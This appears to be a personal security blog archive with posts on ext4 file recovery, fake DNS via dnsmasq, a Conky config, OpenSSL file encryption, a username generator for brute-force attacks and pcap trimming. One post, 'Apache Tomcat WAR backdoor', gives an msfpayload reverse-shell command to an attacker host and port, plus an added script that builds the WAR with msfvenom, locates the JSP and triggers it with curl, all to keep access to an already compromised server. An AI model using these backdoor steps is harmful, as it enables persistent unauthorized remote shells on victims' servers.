Tuesday, March 3, 2015

Undelete files on ext4 filesystem.


Use extundelete version 0.2.4.

DESCRIPTION
       extundelete is a utility that can recover deleted files from an ext3 or ext4 partition
       extundelete uses the information stored in the partition's journal to attempt to recover a file that has been deleted from the partition.
       There is no guarantee that any particular file will be able to be undeleted, so always try to have a good backup system in place, or at least put one in place after recovering your files!

extundelete /dev/sdXN --restore-all

(/dev/sdXN is the ext4 partition to recover from; extundelete needs the device as an argument.) Unmount the partition, or at least remount it read-only, before you start: every write to the filesystem can reuse the freed blocks you are trying to get back. Recovered files are written to ./RECOVERED_FILES in the current directory, so run the command from a directory on a different filesystem. To recover a single file instead of everything, use --restore-file with the path relative to the filesystem root.



Kali ships with an older version which does not work in some cases!
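A small wrapper, added here as an example and not part of the original post, that refuses to run extundelete while the source partition is still mounted, since that is the most common way to lose the blocks you wanted back. The device name, the MOUNTS override (used for testing against a constructed mounts file) and the paths are assumptions.

```shell
#!/bin/sh
# Added example, not from the post: guard extundelete against a mounted source.
set -eu

# is_mounted <device> [mounts-file]  -> exit 0 if the device is a mount source.
# Defaults to /proc/mounts; MOUNTS=... overrides it (handy for testing).
# Note: /proc/mounts lists the resolved device path, so pass the same path you
# would give extundelete (for LVM/dm devices check with findmnt first).
is_mounted() {
    awk -v dev="$1" '$1 == dev { found = 1 } END { if (found) exit 0; exit 1 }' \
        "${2:-${MOUNTS:-/proc/mounts}}"
}

# recover <device> [path-inside-fs]
# Restores one file (path relative to the filesystem root) or everything.
# Output goes to ./RECOVERED_FILES, so run this from a different filesystem.
recover() {
    if is_mounted "$1"; then
        echo "$1 is mounted; umount it (or mount -o remount,ro) before recovering" >&2
        return 1
    fi
    if [ $# -ge 2 ]; then
        extundelete "$1" --restore-file "$2"
    else
        extundelete "$1" --restore-all
    fi
}
```

Usage: `recover /dev/sdb1 home/user/secret.txt` or `recover /dev/sdb1` for everything; the mount check runs before extundelete touches the device.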

Thursday, February 20, 2014

Easy setting fake DNS for testing purposes

This post is about how to set up a fake DNS server on Kali Linux, which helps when remotely testing resources that are not in public DNS. The first thought is to add a record to the /etc/hosts file. That is not always enough, because some tools send their own DNS queries instead of going through the system resolver, so they ignore /etc/hosts and fail to find the target.

For this purpose we will use the "dnsmasq" utility.

We just need to create the /etc/dnsmasq.conf file (if it does not exist already) and add the specific DNS record:

After that we just need to change /etc/resolv.conf to use localhost (127.0.0.1) as the DNS server.

P.S. If DNS resolution for other sites has to keep working, you need to give dnsmasq a different "resolv-file" in /etc/dnsmasq.conf: by default it takes its upstream servers from /etc/resolv.conf, which now points back at dnsmasq itself. The syntax is:
resolv-file=/etc/resolv.conf.localhost (or any other file containing the original nameserver lines).
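The two files described above, generated by a script added here as an example (the post's own screenshots are not reproduced). The fake name target.test, the address 10.0.0.5 and the name of the copied resolver file are assumptions; dnsmasq is assumed to be installed.

```shell
#!/bin/sh
# Added example, not the post's screenshots: write dnsmasq.conf and resolv.conf.
set -eu

# make_dnsmasq_conf <name> <ip> <upstream-resolv-file>
# address=/name/ip answers for the name and everything under it. Use
# host-record=name,ip instead if only the exact name should be faked.
make_dnsmasq_conf() {
    cat <<EOF
# fake record: $1 (and any subdomain of it) -> $2
address=/$1/$2
# upstream servers for every other name; NOT /etc/resolv.conf, which will
# point at dnsmasq itself once it is edited
resolv-file=$3
# answer only on loopback, so the fake records are not served to the LAN
listen-address=127.0.0.1
bind-interfaces
EOF
}

# install_fake_dns <name> <ip>  (run as root)
install_fake_dns() {
    # keep the real upstream servers before resolv.conf is overwritten
    cp /etc/resolv.conf /etc/resolv.conf.localhost
    make_dnsmasq_conf "$1" "$2" /etc/resolv.conf.localhost > /etc/dnsmasq.conf
    printf 'nameserver 127.0.0.1\n' > /etc/resolv.conf
    service dnsmasq restart
    # check: the fake name comes from dnsmasq, a public name still resolves upstream
    dig +short "$1" @127.0.0.1
    dig +short example.com @127.0.0.1
}
```

DHCP clients and NetworkManager rewrite /etc/resolv.conf on every lease renewal, so if the fake name stops resolving after a while, check that the nameserver line still says 127.0.0.1.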

Monday, December 23, 2013

Apache Tomcat WAR backdoor using msfpayload

If you have already compromised an Apache Tomcat web server, it is useful to leave a backdoor for later access.

You can use msfpayload for this:

The screenshot is really small, so this is the command:
#msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 W > reverse_tcp.war


We created a WAR which will connect back to LHOST:LPORT and open a basic Linux shell, so you need a listener on your side. You can use "nc -lvp 4444" for this purpose.

To use the backdoor you need to know the JSP file name, which msfpayload picks at random. You can find it by listing or extracting the files in the WAR:

In this tutorial I assume you already have access to the Tomcat manager and know how to upload a WAR. After you have uploaded it you can trigger the backdoor at any time by accessing:

http://:/reverse_tcp/xsltvorkye.jsp

And that's it! :)
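The same procedure as a script, added here as an example and not part of the original post. Later Metasploit releases removed msfpayload in favour of msfvenom, so the build step uses the msfvenom equivalent of the command above; unzip, nc and curl are assumed to be on the attacker box, and the target host and port given to trigger are assumptions.

```shell
#!/bin/sh
# Added example, not the post's own commands: build, locate and trigger the WAR backdoor.
set -eu

LHOST=192.168.1.100   # attacker address, as in the post
LPORT=4444
WAR=reverse_tcp.war

# msfvenom equivalent of: msfpayload linux/x86/shell_reverse_tcp ... W > reverse_tcp.war
build_war() {
    msfvenom -p linux/x86/shell_reverse_tcp LHOST="$LHOST" LPORT="$LPORT" \
        -f war -o "$WAR"
}

# The JSP inside the archive has a random name. Pull it out of an `unzip -l`
# listing read from stdin (last column is the member name).
jsp_names_from_listing() {
    awk '$NF ~ /\.jsp$/ { print $NF }'
}

# backdoor_url <host> <port> <war-file> <jsp-name>
# Tomcat deploys a WAR at /<war name without .war>/, so the JSP lives there.
backdoor_url() {
    ctx=$(basename "$3" .war)
    printf 'http://%s:%s/%s/%s\n' "$1" "$2" "$ctx" "$4"
}

# trigger <target-host> <target-port>
# Run `nc -lvp $LPORT` on $LHOST in another terminal first; the request below
# returns nothing useful itself, the shell arrives at the listener.
trigger() {
    jsp=$(unzip -l "$WAR" | jsp_names_from_listing | head -n 1)
    url=$(backdoor_url "$1" "$2" "$WAR" "$jsp")
    echo "requesting $url"
    curl -s -o /dev/null "$url"
}
```

Usage: `build_war`, upload the WAR through the manager, then `trigger 10.0.0.7 8080` with the listener already running.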

Sunday, September 29, 2013

My Conky config file


Code of conky.rc
-------------------------------------------------------------------------
background no
font Snap.se:size=8
xftfont Snap.se:size=8
use_xft yes
xftalpha 0.1
update_interval 1.0
total_run_times 0
own_window yes
own_window_type transparent
own_window_transparent yes
own_window_hints undecorated,below,sticky,skip_taskbar,skip_pager
double_buffer yes
draw_shades no
draw_outline no
draw_borders no
draw_graph_borders no
minimum_size 206 5
maximum_width 206
default_color dddddd
default_shade_color 000000
default_outline_color 000000
alignment top_right
gap_x 6
gap_y 22
no_buffers yes
cpu_avg_samples 2
override_utf8_locale no
uppercase no # set to yes if you want all text to be in uppercase
use_spacer left

TEXT
${font LCD:style=Bold:pixelsize=56}${alignc}${time %H:%M}${font Snap.se:size=8}

${font Aerial:style=Bold:pixelsize=12}SYSTEM${font Snap.se:size=8} ${hr 1 }

Hostname: $alignr$nodename
Kernel: $alignr$kernel
Uptime: $alignr$uptime
Processes: ${alignr}$processes ($running_processes running)
Load: ${alignr}$loadavg

Battery    ${battery_time BAT0} ${alignr}(${battery BAT0})
${battery_bar 4 BAT0}

CPU       ${alignc} ${freq}MHz / ${acpitemp}C ${alignr}(${cpu cpu1}%)
${cpu cpu1}%${cpubar 4 cpu1}
${cpu cpu2}%${cpubar 4 cpu2}
${cpu cpu3}%${cpubar 4 cpu3}
${cpu cpu4}%${cpubar 4 cpu4}
${cpugraph cccccc ffffff}

RAM ${alignr}$mem / $memmax ($memperc%)
${membar 4}

SWAP ${alignr}$swap / $swapmax ($swapperc%)
${swapbar 4}

Highest CPU $alignr CPU% MEM%
${hr 1}
${top name 1}$alignr${top cpu 1}${top mem 1}
${top name 2}$alignr${top cpu 2}${top mem 2}
${top name 3}$alignr${top cpu 3}${top mem 3}

Highest MEM $alignr CPU% MEM%
${hr 1}
${top_mem name 1}$alignr${top_mem cpu 1}${top_mem mem 1}
${top_mem name 2}$alignr${top_mem cpu 2}${top_mem mem 2}
${top_mem name 3}$alignr${top_mem cpu 3}${top_mem mem 3}



${font Aerial:style=Bold:pixelsize=12}FILESYSTEM ${font Snap.se:size=8}${hr 1}

Root: ${alignr}${fs_free /} / ${fs_size /}
${fs_bar 4 /}
-------------------------------------------------------------------------------------------

How to use it is easily found with Google.

Friday, August 30, 2013

Encrypting and decrypting files using OpenSSL

If you just need to encrypt a file without installing an additional tool on a Linux box, you can use OpenSSL for the task. It can help when sending sensitive information through insecure channels.

You can use various encryption algorithms (I'm using AES-128 in CBC mode in this example). Two things to keep in mind: by default "openssl enc" derives the key from the password with a single hash iteration, so a short password is cheap to brute-force; on OpenSSL 1.1.1 and later add -pbkdf2 (optionally with -iter) to stretch it properly. And CBC mode provides confidentiality only: nothing in the file detects tampering. Add -a if the channel only carries text, which base64-encodes the output.

root@vo:~# cat test.txt
test test test
root@vo:~# openssl enc -aes-128-cbc -in test.txt -out test.txt.enc 
enter aes-128-cbc encryption password: 
Verifying - enter aes-128-cbc encryption password: 
root@vo:~# rm test.txt

And then use the "-d" option for decrypting:

root@vo:~# openssl enc -d -aes-128-cbc -in test.txt.enc -out test.txt 
enter aes-128-cbc decryption password: 
root@vo:~# cat test.txt 
test test test 

And that's all :)
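The same round trip as a non-interactive script, added here as an example rather than the post's own commands: it uses -pbkdf2 for key stretching and reads the password from a file so it can run unattended. The sample plaintext, the password and the temporary paths are constructed for the example.

```shell
#!/bin/sh
# Added example, not from the post: password-based file encryption with openssl enc.
set -eu

# encrypt_file <plaintext> <ciphertext> <password-file>
# -salt is the default; -pbkdf2 -iter replaces the one-round key derivation.
encrypt_file() {
    openssl enc -aes-128-cbc -salt -pbkdf2 -iter 200000 -md sha256 \
        -pass "file:$3" -in "$1" -out "$2"
}

# decrypt_file <ciphertext> <plaintext> <password-file>
# The same KDF parameters must be given, they are not stored in the file.
decrypt_file() {
    openssl enc -d -aes-128-cbc -pbkdf2 -iter 200000 -md sha256 \
        -pass "file:$3" -in "$1" -out "$2"
}

# roundtrip: encrypt a constructed file, check the on-disk format, decrypt it
# and compare. Returns 0 only if the plaintext survived the trip.
roundtrip() {
    dir=$(mktemp -d)
    printf 'test test test\n' > "$dir/test.txt"                 # constructed input
    printf 'correct horse battery staple\n' > "$dir/pass.txt"   # constructed password
    encrypt_file "$dir/test.txt" "$dir/test.txt.enc" "$dir/pass.txt"
    # a salted enc file starts with the 8-byte magic "Salted__" followed by the salt
    magic=$(dd if="$dir/test.txt.enc" bs=8 count=1 2>/dev/null)
    [ "$magic" = "Salted__" ] || { rm -rf "$dir"; return 1; }
    decrypt_file "$dir/test.txt.enc" "$dir/back.txt" "$dir/pass.txt"
    cmp -s "$dir/test.txt" "$dir/back.txt"
    rc=$?
    rm -rf "$dir"
    return $rc
}
```

A wrong password normally makes the decrypt fail with a "bad decrypt" error, but that comes from the padding check, not from an authentication tag, so do not rely on it to detect a modified file.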

Monday, August 26, 2013

shell script: generate usernames from information found

In almost every penetration test the auditor comes across this kind of information: company employee names and e-mail addresses, which are then used for brute-force or other attacks. Of course this information first has to be translated into the valid username format.

Here is my basic script, which generates "usernames" from a text file containing user data in the following formats:
1) Name Surname
2) Surname Name
3) username@domain
4) name.surname@domain

It generates usernames in these formats:
1) first letter of name + surname (John Smith -> jsmith)
2) first letter of surname + name (John Smith -> sjohn)
3) last letter of username + rest of username (smithj -> jsmith)
4) rest of username + first letter of username (jsmith -> smithj)
5) all of the above trimmed to 8 characters

I plan to add to this script the ability to append a number to the username, like ajons01 or ajons1, which is used when two workers end up with the same letter combination.

The syntax for this script is:
 ./create_username.sh input.txt output.txt
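An implementation of the five rules above, added here as an example; it is not the author's create_username.sh. It reads the four input formats from stdin, writes candidates to stdout, and goes slightly beyond the description by also keeping the e-mail local part itself as a candidate and by lowercasing and de-duplicating the result. The input lines in the usage note are constructed.

```shell
#!/bin/sh
# Added example, not the post's create_username.sh: usernames from names and e-mails.
set -eu

first() { printf '%s' "${1%"${1#?}"}"; }   # first character of $1
last()  { printf '%s' "${1#"${1%?}"}"; }   # last character of $1

# emit <candidate>: lowercase, keep [a-z0-9], print full and 8-char forms (rule 5)
emit() {
    u=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]' | tr -cd 'a-z0-9')
    [ -n "$u" ] || return 0
    printf '%s\n' "$u"
    printf '%.8s\n' "$u"
}

# gen_usernames: stdin lines in the formats "Name Surname", "Surname Name",
# "username@domain" or "name.surname@domain"; stdout unique candidates.
gen_usernames() {
    while IFS= read -r line || [ -n "$line" ]; do
        line=$(printf '%s' "$line" | tr -d '\r')
        case "$line" in
            *@*)
                lp=${line%%@*}                      # local part of the address
                case "$lp" in
                    *.*)                            # name.surname@domain
                        a=${lp%%.*}; b=${lp#*.}
                        emit "$(first "$a")$b"      # rule 1
                        emit "$(first "$b")$a"      # rule 2
                        ;;
                    *)                              # username@domain
                        emit "$lp"                  # the username as given
                        emit "$(last "$lp")${lp%?}" # rule 3: smithj -> jsmith
                        emit "${lp#?}$(first "$lp")" # rule 4: jsmith -> smithj
                        ;;
                esac
                ;;
            *' '*)
                # two words: we cannot tell "Name Surname" from "Surname Name",
                # so both rule 1 and rule 2 are applied (first and last word)
                a=${line%% *}; b=${line##* }
                emit "$(first "$a")$b"
                emit "$(first "$b")$a"
                ;;
        esac
    done | sort -u
}
```

Usage: `printf 'John Smith\nsmithj@example.com\njane.doe@example.com\n' | gen_usernames` prints djane, jdoe, jsmith, mithjs, sjohn and smithj, one per line.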

And here is the link to the script:

Here is sample output showing how it works:



Wireshark: Packet capture file - leave only headers

There are times when you need to send packet capture files to "some support" but you are unsure whether they contain sensitive information. If sending just the packet headers is acceptable (in some cases it is not, if the problem is at the application level), there is a command line tool shipped with Wireshark which can help you:

editcap -s 52  infile.cap outfile.cap

What it does: it chops everything after the first 52 bytes of each packet. Count the headers before choosing the number: Ethernet (14) + IPv4 (20) + UDP (8) fits in 42 bytes, but Ethernet + IPv4 + TCP without options is 54 bytes, so 52 cuts the last two bytes of the TCP header; TCP options add up to 40 more, a VLAN tag 4, and an IPv6 header is 40 bytes instead of 20. Keep in mind that the headers still reveal IP addresses and ports.

After this operation packets in file will be like this:


And on each packet you will see: Packet size limited during capture.

This method is useful when debugging communication problems that are not related to the application layer.

You can check the additional options of editcap using editcap -h: